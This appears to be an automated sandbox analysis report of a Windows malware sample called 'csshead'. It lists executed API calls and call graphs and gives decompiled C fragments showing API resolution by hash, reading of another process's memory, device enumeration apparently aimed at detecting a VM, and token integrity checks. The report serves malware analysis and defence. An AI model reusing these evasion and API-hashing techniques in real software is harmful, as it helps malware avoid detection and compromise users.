19989 432dd8 19988->19989 19990 18215a4 19998 18214a0 19990->19998 20040 18204e0 19998->20040 20054 18202f0 20040->20054 20056 18202f5 20054->20056 19412 41d5c9 19413 41d5d0 DragQueryFile 19412->19413 19422 41d590 19413->19422 19414 41d70f EnableMenuItem 19416 41d971 __cftof2_l 19414->19416 19437 41d75f GetDlgItem OleInitialize 19414->19437 19415 41d694 CreateRectRgnIndirect 19415->19414 19415->19422 19417 41d987 SetMenuItemInfoA 19416->19417 19419 41d9bc GetLastError 19417->19419 19420 41d9c4 DrawMenuBar 19417->19420 19418 41d6e3 WaitForSingleObject 19418->19422 19423 41d9cb __cftof2_l 19419->19423 19420->19423 19421 41d5b0 GetCursorPos 19421->19413 19422->19413 19422->19414 19422->19415 19422->19418 19422->19421 19424 41d9da GetMenuItemInfoA BeginPaint EndPaint GetClientRect EnumDateFormatsA 19423->19424 19429 41da5b 19424->19429 19425 41da80 lstrcmpi 19426 41da8c lstrcmpi 19425->19426 19433 41dac9 19425->19433 19427 41da98 lstrcmpi 19426->19427 19426->19433 19428 41daa4 lstrcmpi 19427->19428 19430 41dac7 19427->19430 19428->19429 19428->19430 19429->19425 19429->19430 19431 4198e0 81 API calls 19430->19431 19432 41db3e Sleep 19430->19432 19431->19432 19432->19433 19436 41d93c RegisterDragDrop GetTopWindow RevokeDragDrop 19438 41d95a OleUninitialize 19436->19438 19437->19436 19438->19416 18671 4091fa 18679 4070e5 18671->18679 18697 407118 18671->18697 18672 4091fc 18714 404a68 GetComputerNameA 18672->18714 18674 409216 18675 4069bc 10 API calls 18674->18675 18676 40921e 18675->18676 18680 407118 18679->18680 18732 403f38 18680->18732 18684 407155 18685 403f38 2 API calls 18684->18685 18686 407166 18685->18686 18736 4038b0 RegQueryValueExA 18686->18736 18688 4071bb 18738 401440 GetProcessHeap HeapFree 18688->18738 18689 407185 18689->18688 18690 403f38 2 API calls 18689->18690 18692 407196 18690->18692 18737 401440 GetProcessHeap HeapFree 18692->18737 18693 4071c3 18739 403890 RegCloseKey 18693->18739 18695 4071cb 18695->18672 18698 403f38 2 API calls 18697->18698 
18699 407130 RegOpenKeyExA 18698->18699 18741 401440 GetProcessHeap HeapFree 18699->18741 18701 407155 18702 403f38 2 API calls 18701->18702 18703 407166 18702->18703 18742 4038b0 RegQueryValueExA 18703->18742 18705 4071bb 18744 401440 GetProcessHeap HeapFree 18705->18744 18706 407185 18706->18705 18707 403f38 2 API calls 18706->18707 18710 407196 18707->18710 18709 4071c3 18745 403890 RegCloseKey 18709->18745 18743 401440 GetProcessHeap HeapFree 18710->18743 18712 4071cb 18712->18672 18715 404aa3 RegOpenKeyExA 18714->18715 18718 404a95 18714->18718 18746 4038b0 RegQueryValueExA 18715->18746 18717 404ae6 18747 403890 RegCloseKey 18717->18747 18718->18715 18720 404af1 18748 4044f0 18720->18748 18722 404b12 GetCurrentProcess 18751 4042d4 OpenProcessToken 18722->18751 18725 4044f0 GetVersionExA 18726 404b2c 18725->18726 18727 404b41 GetCurrentProcess 18726->18727 18728 404b31 18726->18728 18730 4042d4 11 API calls 18727->18730 18765 4041cc GetCurrentThread OpenThreadToken 18728->18765 18731 404b36 18730->18731 18731->18674 18740 4013dc GetProcessHeap RtlAllocateHeap 18732->18740 18734 403f6c RegOpenKeyExA 18735 401440 GetProcessHeap HeapFree 18734->18735 18735->18684 18736->18689 18737->18688 18738->18693 18739->18695 18740->18734 18741->18701 18742->18706 18743->18705 18744->18709 18745->18712 18746->18717 18747->18720 18779 401258 18748->18779 18750 404509 GetVersionExA 18750->18722 18752 4043f9 18751->18752 18753 404300 GetTokenInformation 18751->18753 18752->18725 18754 404322 GetLastError 18753->18754 18755 4043ef CloseHandle 18753->18755 18754->18755 18756 404331 18754->18756 18755->18752 18780 4013dc GetProcessHeap RtlAllocateHeap 18756->18780 18758 404339 18758->18755 18759 404346 GetTokenInformation 18758->18759 18760 404368 GetSidSubAuthorityCount 18759->18760 18761 4043a2 18759->18761 18760->18761 18763 40437d 18760->18763 18781 401440 GetProcessHeap HeapFree 18761->18781 18763->18761 18764 404385 GetSidSubAuthority 18763->18764 18764->18761 18766 4041f4 
GetLastError 18765->18766 18768 404217 18765->18768 18766->18768 18769 404201 GetCurrentProcess OpenProcessToken 18766->18769 18767 4042cc 18767->18731 18768->18767 18782 4013dc GetProcessHeap RtlAllocateHeap 18768->18782 18769->18768 18771 40422b GetTokenInformation CloseHandle 18772 40425a AllocateAndInitializeSid 18771->18772 18773 4042c4 18771->18773 18774 4042ba FreeSid 18772->18774 18777 404288 18772->18777 18783 401440 GetProcessHeap HeapFree 18773->18783 18774->18773 18776 404293 EqualSid 18776->18777 18778 4042ac 18776->18778 18777->18774 18777->18776 18778->18774 18779->18750 18780->18758 18781->18755 18782->18771 18783->18767 19541 45500e 19542 455030 VirtualProtect VirtualProtect 19541->19542 19544 4551c3 19542->19544 19544->19544 19529 4091ac 19535 406dc8 GetTickCount Sleep 19529->19535 19537 406db0 19529->19537 19530 4091ae 19531 4069bc 10 API calls 19530->19531 19532 4091e8 19531->19532 19536 406de8 19535->19536 19536->19530 19538 406dbe GetTickCount Sleep 19537->19538 19540 406de8 19538->19540 19540->19530

    Executed Functions

    Control-flow Graph

    control_flow_graph 0 419d20-419f20 CoInitialize NtdllDefWindowProc_A call 418480 GetCommandLineA CreateMenu LoadMenuA LoadBitmapA AppendMenuA LoadMenuA BeginDeferWindowPos 7 419f22-419f33 CreateMetaFileA 0->7 7->7 8 419f35-419f83 SetBrushOrgEx LoadImageA call 423911 7->8 11 41dbde-41dc07 call 423189 call 423991 8->11 12 419f89-41a33e FtpPutFileEx GetSysColorBrush FrameRect call 422158 GlobalAlloc GetLastError GetIconInfo * 2 GetDIBits * 2 call 42240e * 2 call 422840 * 2 GetDIBits * 2 8->12 35 41a343-41a39b GetDlgItem SetWindowContextHelpId 12->35 35->35 36 41a39d-41a949 call 422840 mmioSetInfo mmioAscend GetSystemInfo GetSystemTimeAsFileTime SetConsoleCtrlHandler CreateIoCompletionPort CopyImage 35->36 52 41a950-41a981 call 421dde 36->52 55 41a983-41c8f6 call 432952 DrawMenuBar FindResourceA VirtualAlloc call 432cd2 call 422840 LoadLibraryA LoadIconA OleCreatePictureIndirect call 422840 LoadLibraryA LoadIconA OleCreatePictureIndirect call 422840 LoadLibraryA LoadIconA OleCreatePictureIndirect call 42240e * 4 call 432d0e * 2 call 42240e * 4 call 432d0e * 2 call 421dd8 call 422a18 call 421dd8 LoadLibraryA LoadIconA OleCreatePictureIndirect call 421dd8 call 422a18 call 421dd8 LoadLibraryA LoadIconA OleCreatePictureIndirect call 421dd8 call 422a18 call 421dd8 call 42240e * 4 call 432d0e * 2 LoadLibraryA LoadIconA OleCreatePictureIndirect call 42240e * 4 call 432d0e * 2 call 421dd8 call 422a18 call 421dd8 call 422840 call 421dd8 call 422a18 call 421dd8 * 2 call 422a18 call 421dd8 call 422840 call 42240e * 4 call 432d0e * 2 call 421dd8 call 422a18 call 421dd8 LoadLibraryA LoadIconA OleCreatePictureIndirect call 422840 call 42240e * 4 call 432d0e * 2 call 421dd8 call 422a18 call 421dd8 LoadLibraryA LoadIconA OleCreatePictureIndirect LoadLibraryA LoadIconA OleCreatePictureIndirect call 42240e * 4 call 432d0e * 2 call 422840 call 421dd8 call 422a18 call 421dd8 call 422840 LoadLibraryA LoadIconA OleCreatePictureIndirect LoadLibraryA LoadIconA OleCreatePictureIndirect 
call 421dd8 call 422a18 call 421dd8 call 422840 call 421dd8 call 422a18 call 421dd8 LoadLibraryA LoadIconA OleCreatePictureIndirect call 42240e * 4 call 432d0e * 2 call 42240e * 4 call 432d0e * 2 call 422840 call 42240e * 4 call 432d0e * 2 call 422840 call 421dd8 call 422a18 call 421dd8 call 422840 call 421dd8 call 422a18 call 421dd8 call 42240e * 4 call 432d0e * 2 LoadLibraryA LoadIconA OleCreatePictureIndirect call 421dd8 call 422a18 call 421dd8 call 42240e * 4 call 432d0e * 2 call 421dd8 call 422a18 call 421dd8 LoadLibraryA LoadIconA OleCreatePictureIndirect call 422840 call 421dd8 call 422a18 call 421dd8 LoadLibraryA LoadIconA OleCreatePictureIndirect call 42240e * 4 call 432d0e * 2 call 42240e * 4 call 432d0e * 2 call 422840 LoadLibraryA LoadIconA OleCreatePictureIndirect call 421dd8 call 422a18 call 421dd8 call 422840 LoadLibraryA LoadIconA OleCreatePictureIndirect call 422840 call 42240e * 4 call 432d0e * 2 call 421dd8 call 422a18 call 421dd8 LoadLibraryA LoadIconA OleCreatePictureIndirect 52->55 507 41c8fa-41c959 55->507 507->11
    APIs
    • CoInitialize.OLE32(00000000), ref: 00419D2C
    • NtdllDefWindowProc_A.NTDLL(00000000,00000000,00000000,00000000), ref: 00419D3A
      • Part of subcall function 00418480: RtlEnterCriticalSection.NTDLL(00442B64), ref: 0041848C
      • Part of subcall function 00418480: RegisterClipboardFormatA.USER32(WM_ATLGETHOST), ref: 0041849D
      • Part of subcall function 00418480: RegisterClipboardFormatA.USER32(WM_ATLGETCONTROL), ref: 004184A9
      • Part of subcall function 00418480: GetClassInfoExA.USER32(00442B90,AtlAxWin100,?), ref: 004184D0
      • Part of subcall function 00418480: LoadCursorA.USER32 ref: 0041850E
      • Part of subcall function 00418480: RegisterClassExA.USER32 ref: 00418531
      • Part of subcall function 00418480: GetClassInfoExA.USER32(00442B90,AtlAxWinLic100,?), ref: 0041857A
      • Part of subcall function 00418480: LoadCursorA.USER32 ref: 004185B2
      • Part of subcall function 00418480: RegisterClassExA.USER32 ref: 004185D5
      • Part of subcall function 00418480: RtlLeaveCriticalSection.NTDLL(00442B64), ref: 00418604
    • GetCommandLineA.KERNEL32 ref: 00419DA4
    • CreateMenu.USER32 ref: 00419EAE
    • LoadMenuA.USER32(?,Menu), ref: 00419EC9
    • LoadBitmapA.USER32(?,Bitmap), ref: 00419EDC
    • AppendMenuA.USER32(00000000,00000014,?,00000000), ref: 00419EEC
    • LoadMenuA.USER32(?,Edit), ref: 00419EFF
    • BeginDeferWindowPos.USER32(00442A98), ref: 00419F07
    • CreateMetaFileA.GDI32(?), ref: 00419F2B
    • SetBrushOrgEx.GDI32(00000000,00000001,00000000,00000000), ref: 00419F3A
    • LoadImageA.USER32(?,?,00000001,00000010,00000010,00000000), ref: 00419F6A
      • Part of subcall function 00423911: std::exception::exception.LIBCMT ref: 00423960
    • FtpPutFileEx.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0041A00D
    • GetSysColorBrush.USER32(0000000F), ref: 0041A084
    • FrameRect.USER32(00000000,?,00000000), ref: 0041A094
    • GlobalAlloc.KERNEL32(00001000,00000838), ref: 0041A0C0
    • GetLastError.KERNEL32 ref: 0041A101
    • GetIconInfo.USER32(00000000,?), ref: 0041A12D
    • GetIconInfo.USER32(00000000,?), ref: 0041A14D
    • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0041A22B
    • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0041A244
    • GetDIBits.GDI32(00000000,?,00000000,?,00000000,?,00000000), ref: 0041A2EB
    • GetDIBits.GDI32(00000000,?,00000000,?,00000000,?,00000000), ref: 0041A309
    • GetDlgItem.USER32(00000000,00442A98), ref: 0041A390
    • SetWindowContextHelpId.USER32(00000000), ref: 0041A393
    • mmioSetInfo.WINMM(0000002F,?,0000002F), ref: 0041A422
    • mmioAscend.WINMM(0000002F,?,0000002F), ref: 0041A457
    • GetSystemInfo.KERNELBASE(?), ref: 0041A47E
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0041A4E5
    • SetConsoleCtrlHandler.KERNEL32(00442AA0,00000001), ref: 0041A4F3
    • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0041A572
    • CopyImage.USER32(?,00000000,?,00442AA4,00000008), ref: 0041A93E
    • DrawMenuBar.USER32(00000061), ref: 0041AA1D
    • FindResourceA.KERNEL32(00000061,?,WAV), ref: 0041AA31
    • VirtualAlloc.KERNELBASE(00000000,00342AA0,00003000,00000022), ref: 0041AA4F
    • LoadLibraryA.KERNELBASE(open), ref: 0041AAAF
    • LoadIconA.USER32(00000000,00000064), ref: 0041AABA
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041AAE1
    • LoadLibraryA.KERNELBASE(open,?,00000001,?), ref: 0041AB71
    • LoadIconA.USER32(00000000,00000064), ref: 0041AB76
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041ABA3
    • LoadLibraryA.KERNELBASE(open,?,?,?,?,00000001,?), ref: 0041AC29
    • LoadIconA.USER32(00000000,00000064), ref: 0041AC2E
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041AC55
      • Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D
    • LoadLibraryA.KERNELBASE(open,00000002,00000000), ref: 0041AE48
    • LoadIconA.USER32(00000000,00000064), ref: 0041AE4D
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041AE74
    • LoadLibraryA.KERNELBASE(open,00000002,00000000,00000002,00000000,00000000,?,?,?,00000003,?,00000001,00000001,00000003,?,?), ref: 0041AF4B
    • LoadIconA.USER32(00000000,00000064), ref: 0041AF56
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041AF7D
    • LoadLibraryA.KERNELBASE(open,?,00000001,00000001,00000003), ref: 0041B0C5
    • LoadIconA.USER32(00000000,00000064), ref: 0041B0CA
    • OleCreatePictureIndirect.OLEAUT32(?,?,00000001,?), ref: 0041B0F1
    • LoadLibraryA.KERNELBASE(open,00000002,00000000), ref: 0041B4E7
    • LoadIconA.USER32(00000000,00000064), ref: 0041B4F0
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041B51A
    • LoadLibraryA.KERNELBASE(open,00000002,00000000,00000002,00000000,?,?,?,00000003,00000001,00000000), ref: 0041B6B1
    • LoadIconA.USER32(00000000,00000064), ref: 0041B6BC
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041B6E9
    • LoadLibraryA.KERNELBASE(open), ref: 0041B72C
    • LoadIconA.USER32(00000000,00000064), ref: 0041B731
    • OleCreatePictureIndirect.OLEAUT32(?,?,00000001,?), ref: 0041B758
    • LoadLibraryA.KERNELBASE(open,00000000,?,?,?,00000001,00000001,00000003,?,?,?,?,?,00000001,?), ref: 0041B90F
    • LoadIconA.USER32(00000000,00000064), ref: 0041B914
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041B93B
    • LoadLibraryA.KERNELBASE(open), ref: 0041B9DE
    • LoadIconA.USER32(00000000,00000064), ref: 0041B9E3
    • OleCreatePictureIndirect.OLEAUT32(?,?,00000001,?), ref: 0041BA0E
    • LoadLibraryA.KERNELBASE(open,00000002,00000000,00000002,00000000,00000000,?,?,?,?,?,?), ref: 0041BB90
    • LoadIconA.USER32(00000000,00000064), ref: 0041BB95
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041BBC0
    • LoadLibraryA.KERNELBASE(open,?,00000001,00000001,00000003), ref: 0041C08A
    • LoadIconA.USER32(00000000,00000064), ref: 0041C08F
    • OleCreatePictureIndirect.OLEAUT32(?,?,00000001,?), ref: 0041C0BA
    • LoadLibraryA.KERNELBASE(open,00000002,00000000,00000002,00000000,?,?,?,00000003,00000000,?,?,?,00000003,00000000,00000000), ref: 0041C2AB
    • LoadIconA.USER32(00000000,00000064), ref: 0041C2B6
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041C2DD
    • LoadLibraryA.KERNELBASE(open,00000002,00000000,00000002,00000000,00000000,?,?,?), ref: 0041C3B6
    • LoadIconA.USER32(00000000,00000064), ref: 0041C3BB
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041C3E2
    • LoadLibraryA.KERNELBASE(open,00000001,00000001,00000003,?,00000001,00000001,00000003,?,?,?,00000001,?), ref: 0041C5C1
    • LoadIconA.USER32(00000000,00000064), ref: 0041C5C6
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041C5F1
    • LoadLibraryA.KERNELBASE(open,?,?,?,?,?,?,?,?,?,00000001,?,?,?,?,00000001), ref: 0041C6E7
    • LoadIconA.USER32(00000000,00000064), ref: 0041C6EC
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041C717
    • LoadLibraryA.KERNELBASE(open,00000002,00000000), ref: 0041C8B9
    • LoadIconA.USER32(00000000,00000064), ref: 0041C8BE
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041C8E9
      • Part of subcall function 00423991: RaiseException.KERNEL32(?,?,00423990,000000F4,?,?,?,?,00423990,000000F4,0043C9F8,00442BF0,000000F4,?,?,00000000), ref: 004239D3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
      • Part of subcall function 00422A18: RtlAllocateHeap.NTDLL(00000000,00000001,?), ref: 00422A5D
    • LoadLibraryA.KERNELBASE(open,00000002,00000000,00000002,00000000,00000000,?,?,?,00000001,00000001,00000003,00000000,?,?,?), ref: 0041CAE5
    • LoadIconA.USER32(00000000,00000064), ref: 0041CAF0
    • OleCreatePictureIndirect.OLEAUT32 ref: 0041CB1D
    • LoadLibraryA.KERNELBASE(open), ref: 0041CB7D
    • LoadIconA.USER32(00000000,00000064), ref: 0041CB82
    • OleCreatePictureIndirect.OLEAUT32(?,?,00000001,?), ref: 0041CBA9
    • CreateEventA.KERNEL32(00000058,00000058,00000058,Xstore), ref: 0041CD17
    • GetClassLongA.USER32(00000058,000000E6), ref: 0041CD4A
    • SetClassLongA.USER32(00442AA8,000000E6,00000000), ref: 0041CD5F
    • GetCursorPos.USER32(0000000A), ref: 0041CD6A
    • GetCursorPos.USER32(?), ref: 0041CD89
    • WaitForSingleObject.KERNEL32(?,00000BB7,00000000), ref: 0041CFB9
    • WaitNamedPipeA.KERNEL32(\\.\pipe\pipe,000000FF), ref: 0041D097
    • CreateFileA.KERNELBASE(\\.\pipe\pipe,C0000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D0B7
    • SetNamedPipeHandleState.KERNELBASE(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D0D3
    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D0E4
    • WriteFile.KERNELBASE(00000000,00433E5C,00000030,?,00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D101
    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D108
    • ReadFile.KERNELBASE(00000000,?,00000030,?,00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D11C
    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000001,?), ref: 0041D123
    • LookupAccountNameA.ADVAPI32(?,?,00000000,?,00000000,?,?), ref: 0041D16A
    • GetLastError.KERNEL32 ref: 0041D172
    • GetLastError.KERNEL32 ref: 0041D17B
    • GetLastError.KERNEL32 ref: 0041D190
    • LocalAlloc.KERNEL32(00000040,?), ref: 0041D1A8
    • GetLastError.KERNEL32 ref: 0041D1B0
    • LocalAlloc.KERNEL32(00000040,?), ref: 0041D1C7
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 0041D1CF
    • LookupAccountNameA.ADVAPI32(?,?,00000000,?,00000000,?,?), ref: 0041D1FB
    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 0041D201
      • Part of subcall function 004242F0: __woutput_l.LIBCMT ref: 00424356
      • Part of subcall function 004242F0: __ftbuf.LIBCMT ref: 00424367
    • LocalFree.KERNEL32(00000000), ref: 0041D216
    • SetStretchBltMode.GDI32(00000000,00000004), ref: 0041D2F8
    • SetAbortProc.GDI32(00000000,004047A0), ref: 0041D323
    • DrawFrameControl.USER32(?,?,00000004,00004210), ref: 0041D34C
    • LoadImageA.USER32(?,?,00000000,00000000,00000000,00000000), ref: 0041D3B1
    • SetWindowLongA.USER32(00000000,000000EC,00000080), ref: 0041D3DF
      • Part of subcall function 00417E60: GetWindowLongA.USER32(?,000000EC), ref: 00417F10
      • Part of subcall function 00417E60: GetWindowLongA.USER32(?,000000EC), ref: 00417F23
      • Part of subcall function 00417E60: SetWindowLongA.USER32(?,000000EC,00000000), ref: 00417F2E
      • Part of subcall function 00417E60: GetWindowLongA.USER32(?,000000EB), ref: 00417F3F
      • Part of subcall function 00417E60: OleUninitialize.OLE32 ref: 00417F51
      • Part of subcall function 00417E60: OleInitialize.OLE32(00000000), ref: 00417F5E
      • Part of subcall function 00417E60: GetWindowTextLengthA.USER32(?), ref: 00417F68
      • Part of subcall function 00417E60: GetWindowTextA.USER32(?,00000000,00000001), ref: 00417FB7
      • Part of subcall function 00417E60: SetWindowTextA.USER32(?,00433C2A), ref: 00417FC3
      • Part of subcall function 00417E60: GlobalAlloc.KERNEL32(00000042,00000000), ref: 00417FEA
      • Part of subcall function 00417E60: GlobalFix.KERNEL32(00000000), ref: 00417FF7
      • Part of subcall function 00417E60: GlobalUnWire.KERNEL32(00000000), ref: 00418012
      • Part of subcall function 00417E60: lstrlen.KERNEL32(00000000), ref: 00418031
      • Part of subcall function 00417E60: SetWindowLongA.USER32(?,000000EB,?), ref: 00418139
      • Part of subcall function 00417E60: NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 00418176
    • CreateEventA.KERNEL32(00000000,00000000,00000000,denfers), ref: 0041D577
    • GetCursorPos.USER32(00000005), ref: 0041D586
    • GetCursorPos.USER32(?), ref: 0041D5B8
    • DragQueryFile.SHELL32(00000000,000000FF,?,00000104), ref: 0041D5E1
    • CreateRectRgnIndirect.GDI32(?), ref: 0041D6AF
    • WaitForSingleObject.KERNEL32(?,00000BB6), ref: 0041D6ED
    • EnableMenuItem.USER32(?,0000000C,00000000), ref: 0041D74B
    • GetDlgItem.USER32(00000000,00442A98), ref: 0041D91F
    • OleInitialize.OLE32(00000000), ref: 0041D929
    • RegisterDragDrop.OLE32(00000000,00442AA0), ref: 0041D93E
    • GetTopWindow.USER32(00000000), ref: 0041D946
    • RevokeDragDrop.OLE32(00000000), ref: 0041D94D
    • OleUninitialize.OLE32 ref: 0041D96B
    • SetMenuItemInfoA.USER32 ref: 0041D9B2
    • GetLastError.KERNEL32 ref: 0041D9BC
    • DrawMenuBar.USER32(00000000), ref: 0041D9C5
    • GetMenuItemInfoA.USER32 ref: 0041D9FA
    • BeginPaint.USER32(00442AA8,?), ref: 0041DA0F
    • EndPaint.USER32(00442AA8,?), ref: 0041DA1E
    • GetClientRect.USER32 ref: 0041DA38
    • EnumDateFormatsA.KERNEL32(?,00000400,00000001), ref: 0041DA4D
    • lstrcmpi.KERNEL32(?,UnregServer), ref: 0041DA86
    • lstrcmpi.KERNEL32(?,RegServer), ref: 0041DA92
    • lstrcmpi.KERNEL32(?,Automation), ref: 0041DA9E
    • lstrcmpi.KERNEL32(?,Embedding), ref: 0041DAAA
      • Part of subcall function 004198E0: RtlEnterCriticalSection.NTDLL ref: 0041991C
      • Part of subcall function 004198E0: GetCurrentThreadId.KERNEL32 ref: 00419922
      • Part of subcall function 004198E0: RtlLeaveCriticalSection.NTDLL(00442A20), ref: 00419942
      • Part of subcall function 004198E0: InterlockedIncrement.KERNEL32(00442AE0), ref: 004199D7
      • Part of subcall function 004198E0: ShowWindow.USER32(?,?), ref: 004199EA
    • Sleep.KERNEL32(00442B20,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 0041DBB9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd

    Control-flow Graph

    C-Code - Quality: 100%
    			E00406EEC(void* __ecx) {
    				intOrPtr _v8;
    				struct HINSTANCE__* _v12;
    				void* _v16;
    				void* _v20;
    				void* _v24;
    				CHAR* _v28;
    				void* _v32;
    				void* _v161;
    				void* _v192;
    				intOrPtr _t54;
    				struct HINSTANCE__* _t57;
    
    				_v8 = 0;
    				_t54 =  *0x40a55c; // 0x406ed0
    				_v28 = E00403F38(_t54);
    				_t57 = LoadLibraryA(_v28); // executed
    				_v12 = _t57;
    				E00401440(_v28);
    				if (_v12 == 0) goto L7;
    			}

    Instruction addresses of the statements above
    0x00406ef7
    0x00406efa
    0x00406f04
    0x00406f0b
    0x00406f11
    0x00406f17
    0x00406f20

    APIs
    • LoadLibraryA.KERNELBASE(?), ref: 00406F0B
      • Part of subcall function 00401440: GetProcessHeap.KERNEL32(00000000,?), ref: 0040144D
      • Part of subcall function 00401440: HeapFree.KERNEL32(00000000), ref: 00401454
    • SetupDiGetClassDevsA.SETUPAPI(0040A014,00000000,00000000,00000002), ref: 00406F79
    • SetupDiEnumDeviceInfo.SETUPAPI(?,?,0000001C), ref: 00406FA7
    • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,00000000,?,00000000,00000081,?), ref: 00406FCE
    • CharLowerBuffA.USER32(00000000,00000000), ref: 00406FE7
    • SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 00406FF1
    • SetupDiGetClassDevsA.SETUPAPI(0040A024,00000000,00000000,00000002), ref: 00407028
    • SetupDiEnumDeviceInfo.SETUPAPI(?,?,0000001C), ref: 00407056
    • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(?,0000001C,0000000C,?,00000000,00000081,?), ref: 0040707D
    • CharLowerBuffA.USER32(00000000,00000000), ref: 00407096
    • SetupDiDestroyDeviceInfoList.SETUPAPI(?), ref: 004070A0
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 100%
    			E00404E94(void* __eax) {
    				void* _v8;
    				intOrPtr _v12;
    				long _v16;
    				long _v20;
    				void* _v24;
    				void _v28;
    				intOrPtr _v48;
    				void _v52;
    
    				_v8 = __eax;
    				_v16 = NtQueryInformationProcess(_v8, 0,  &_v52, 0x18,  &_v20);
    				if(_v16 == 0 && _v48 != 0) {
    					_v24 = _v48 + 8;
    					ReadProcessMemory(_v8, _v24,  &_v28, 4,  &_v20); // executed
    					_v12 = _v28;
    				}
    				return _v12;
    			}

    Instruction addresses of the statements above
    0x00404e9a
    0x00404eb3
    0x00404eba
    0x00404ec8
    0x00404edd
    0x00404ee6
    0x00404ee6
    0x00404eef

    APIs
    • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 00404EAD
    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,?), ref: 00404EDD
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • SetUnhandledExceptionFilter.KERNELBASE(Function_0001CA06), ref: 0042CA4D
    Memory Dump Source
    • Source File: 00000000.00000002.27490429877.00410000.00000040.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    Memory Dump Source
    • Source File: 00000000.00000002.27490385970.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.27490362512.00400000.00000002.sdmp
    • Associated: 00000000.00000002.27490373963.00401000.00000040.sdmp
    • Associated: 00000000.00000002.27490402428.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.27490416512.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd

    Control-flow Graph

    C-Code - Quality: 100%
    			E00402574(intOrPtr __eax) {
    				intOrPtr _v8;
    				struct HINSTANCE__* _v12;
    				CHAR* _t492;
    				CHAR* _t500;
    				struct HINSTANCE__* _t564;
    				CHAR* _t567;
    				struct HINSTANCE__* _t568;
    				CHAR* _t571;
    				CHAR* _t587;
    				CHAR* _t669;
    				CHAR* _t677;
    				CHAR* _t685;
    				CHAR* _t693;
    				CHAR* _t699;
    				struct HINSTANCE__* _t700;
    				CHAR* _t707;
    				struct HINSTANCE__* _t708;
    				intOrPtr _t712;
    				CHAR* _t713;
    				CHAR* _t755;
    
    				_v8 = __eax;
    				_v12 = E004024F8();
    				 *0x40b11c = E00401994(_v12, 0xc8ac8026);
    				 *0x40b120 = E00401994(_v12, 0x4b935b8e);
    				 *0x40b1d0 = E00401994(_v12, 0x78b00c7e);
    				 *0x40b144 = E00401994(_v12, 0x25447ac6);
    				 *0x40b148 = E00401994(_v12, 0xf50b872);
    				 *0x40b160 = E00401994(_v12, 0x9e6fa842);
    				 *0x40b1bc = E00401994(_v12, 0x7d544dbd);
    				 *0x40b124 = E00401994(_v12, 0x1fc0eaee);
    				 *0x40b384 = E00401994(_v12, 0x270118e2);
    				 *0x40b498 = E00401994(_v12, 0x4ae7572b);
    				 *0x40b138 = E00401994(_v12, 0x81f0f0c9);
